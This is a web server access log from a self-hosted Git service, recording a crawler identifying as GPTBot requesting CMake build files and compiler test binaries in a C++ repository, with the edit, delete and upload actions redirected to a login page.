"https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:46:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:46:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9846] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:18:46:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:18:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:18:46:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11279] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11280] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11276] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:18:46:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:46:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:46:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:18:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:18:46:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:18:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9883] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:46:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9889] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9880] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:46:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:46:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 